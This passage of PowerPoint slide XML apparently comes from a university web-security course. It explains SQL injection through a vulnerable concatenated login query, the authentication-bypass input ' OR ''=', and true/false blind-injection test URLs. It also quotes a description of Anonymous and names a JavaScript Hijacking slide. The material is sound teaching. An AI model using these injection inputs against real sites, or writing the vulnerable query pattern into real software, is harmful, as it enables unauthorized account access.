                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="955E4B"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="955E4B"/>
              </a:solidFill>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Consider the following SQL code in the backend for authenticating users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> = "SELECT Username FROM Users WHERE Username =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 &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>strUsername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> &amp;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 AND Password =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&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>strPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> &amp;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>strAuthCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>GetQueryResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Suppose an attacker submits a login and password that looks like the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Login: ' OR ''='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Password: ' OR ''='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This will cause the resulting SQL query to become:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Instead of comparing the user-supplied data with entries in the Users table, the query compares '' (empty string) to '' (empty string). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This will return a True result and the attacker will then be logged in as the first user in the Users table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3"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ltLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection (cont..)</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65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89A0724-1D76-4565-8555-D3724C328B19}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Normal SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In this form of SQL Injection, the attacker is guided by the SQL Error messages that the server returns and keeps modifying his queries till the server is satisfied. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In Blind SQL Injection, instead of returning a database error, the server returns a customer-friendly error page informing the user that a mistake has been made. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In this instance, SQL Injection is still possible, but not as easy to detect. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A common way to detect Blind SQL Injection is to put a false and true statement into the parameter value. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Executing the following request to a web site:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example/article.asp?ID=2+and+1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>should return the same web page as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example/article.asp?ID=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>because the SQL statement 'and 1=1' is always true.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Executing the following request to a web site:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://example/article.asp?ID=2+and+1=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>would then cause the web site to return a friendly error or no page at all. This is because the SQL statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>and 1=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> is always false.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Once the attacker discovers that a site is susceptible to Blind SQL Injection, he can exploit further.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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Anonymous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Anonymous is an international cabal of criminal hackers dating back to 2003 who have shut down the websites of the U.S. department of Justice and the F.B.I. they have hacked into the phone lines of Scotland Yard. They are responsible for attacks against MasterCard, Visa, Sony and the Governments of the U.S., U.K., Turkey, Australia, Egypt, Algeria, Libya, Iran, Chile, Columbia and New Zealand.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Canadian MP Marc Gameau, 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Anonymous: Message to the American People video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>http://www.youtube.com/watch?feature=player_embedded&amp;v=dlva-3FO7No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2969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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297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136445-13C8-4C01-B6C3-590E7F7FA146}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Hijacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>https://capec.mitre.org/data/definitions/111.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9318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75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1B1E99A-9328-4E13-AE96-B81C402C0DCE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
